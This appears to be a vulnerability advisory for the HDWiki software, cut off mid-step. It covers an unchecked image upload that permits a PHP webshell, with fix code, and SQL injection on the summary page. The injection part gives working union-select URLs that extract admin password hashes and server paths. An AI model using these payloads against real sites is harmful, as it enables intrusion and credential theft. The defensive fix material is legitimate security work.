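1.
Vulnerability: when editing an entry and uploading an image, the server does not check the file type, so a PHP file can be uploaded directly and used to obtain a webshell.
Fix: modify the file wiki/control/attachment.php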
// Reject any upload whose extension is not jpg, gif or png
if ($extname != "jpg" && $extname != "gif" && $extname != "png")
{
    $_ENV['attachment']->showmsg($imgname);
    exit;
}
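The fix above looks only at the extension. As an added example (not HDWiki's own code; the function name safe_image_name, the ALLOWED_IMAGES table and the sample files are hypothetical, and PHP's fileinfo extension is assumed to be available), the following also checks the file content and generates the stored name on the server:

```php
<?php
// Added example, not HDWiki code. All names here are hypothetical.

// Allowlist: detected MIME type => extension used for the stored file.
const ALLOWED_IMAGES = [
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
    'image/png'  => 'png',
];

// Returns a server-generated file name for an acceptable image,
// or null when the upload must be rejected.
function safe_image_name(string $clientName, string $tmpPath): ?string
{
    // 1. Extension check on the final extension, case-insensitive.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_IMAGES, true)) {
        return null;
    }
    // 2. Content check: the bytes must be detected as the same image type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || (ALLOWED_IMAGES[$mime] ?? null) !== $ext) {
        return null;
    }
    // 3. Never reuse the client-supplied name: random base name plus
    //    the allowlisted extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs: [client file name, file bytes].
$gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');
$samples = [
    ['shell.php',     "<?php echo 'not an image';"], // wrong extension
    ['shell.php.jpg', "<?php echo 'not an image';"], // content is not a JPEG
    ['photo.GIF',     $gif],                         // real 1x1 GIF
];

foreach ($samples as [$name, $bytes]) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    $stored = safe_image_name($name, $tmp);
    printf("%-14s => %s\n", $name, $stored ?? 'rejected');
    unlink($tmp);
}
```

In a real upload handler, call the function on a path that has passed is_uploaded_file() and store the file with move_uploaded_file() under the returned name. The upload directory should also be configured so the web server never executes scripts from it.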
2.
Vulnerability: SQL injection in the summary page
(1) Obtain the admin user's password (change groupid to 2 to obtain another user's password)
http://[domain]/wiki/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,concat%28username,0x7c,password%29,7,8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20wiki_user%20where%20groupid=4%23
(2) Obtain the absolute web path on the server
http://[domain]/wiki/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,@@datadir,7,8,9,0,1,2,3,4,5,6,7,8,9,0%23
(3) Write a